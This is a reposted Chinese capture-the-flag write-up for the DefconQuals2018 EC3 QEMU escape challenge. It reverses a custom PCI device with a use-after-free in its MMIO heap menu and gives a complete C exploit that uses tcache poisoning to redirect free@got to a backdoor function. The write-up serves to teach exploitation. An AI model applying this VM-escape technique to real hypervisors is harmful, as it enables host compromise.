码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [qemu逃逸] DefconQuals2018-EC3


    前言

    一道简单的套壳堆题.原本题目环境为 ubu16, 我这里使用的是 ubu18

    设备逆向

    qemu-system-x86_64 只开了 Canary 和 NX 保护.

    比较简单, 主要逻辑在 mmio_write 里面, 其实现了一个菜单堆, 具有增删改的功能:

    但是在释放堆块时并没有置空, 所以这里存在 UAF. 而程序还直接给了后门:

    漏洞利用

    笔者的环境是 ubu18, glibc为2.27, 存在 tcache 并且没有相关检查. 所以利用比较简单. 直接打 free@got 为后门函数地址即可.

    exp 如下: 注意这里每次写入是 4 字节, 如果写 8 字节会分两次写入

    1. #include
    2. #include
    3. #include
    4. #include
    5. #include
    6. #include
    7. #define ADD 0
    8. #define DELE 1
    9. #define EDIT 2
    10. void* mmio_base;
    11. void mmio_init()
    12. {
    13. int fd = open("sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR);
    14. if (fd < 0) puts("[X] open device file"), exit(EXIT_FAILURE);
    15. mmio_base = mmap(0, 0x1000000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    16. if (mmio_base < 0) puts("[X] mmap for mmio"), exit(EXIT_FAILURE);
    17. printf("[+] mmio_base: %#p\n", mmio_base);
    18. if (mlock(mmio_base, 0x1000000) < 0) puts("[X] mlock for mmio_base"), exit(EXIT_FAILURE);
    19. }
    20. void mmio_write(uint64_t cmd, uint64_t idx, uint64_t offset, uint32_t val)
    21. {
    22. uint64_t addr = (cmd << 20) | (idx << 16) | offset;
    23. *(uint32_t*)(mmio_base + addr) = val;
    24. }
    25. int main(int argc, char** argv, char** envp)
    26. {
    27. mmio_init();
    28. mmio_write(ADD, 10, 0, 1);
    29. mmio_write(ADD, 0, 0, 82);
    30. mmio_write(DELE, 0, 0, 0);
    31. mmio_write(EDIT, 0, 0, 0x11301A0);
    32. mmio_write(EDIT, 0, 4, 0);
    33. mmio_write(ADD, 1, 0, 82);
    34. mmio_write(ADD, 2, 0, 82);
    35. mmio_write(EDIT, 2, 0, 0x6E65F9);
    36. mmio_write(EDIT, 2, 4, 0);
    37. mmio_write(DELE, 10, 0, 0);
    38. return 0;
    39. }

    效果如下:

  • 相关阅读:
    [HQS]C++相关语法
    python-docx办公自动化批量生成离职证明
    树莓派4B_OpenCv学习笔记21:OpenCV_haar人脸识别
    企业应用集成
    这500万你领了吗?成都市生物医药产业发展的专项政策申报奖励
    NewStarCTF 2023 公开赛道 WEEK2|MISC1-序章
    万字长文总结分布式事务,总有一款适合你
    第一次搭建接口自动化测试框架有什么要注意的吗?
    找了很多关于抖音小店的干货文章,但还是做不好,这是为什么呢?
    MBatis-plus:架构使用
  • 原文地址:https://blog.csdn.net/qq_61670993/article/details/134489901
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号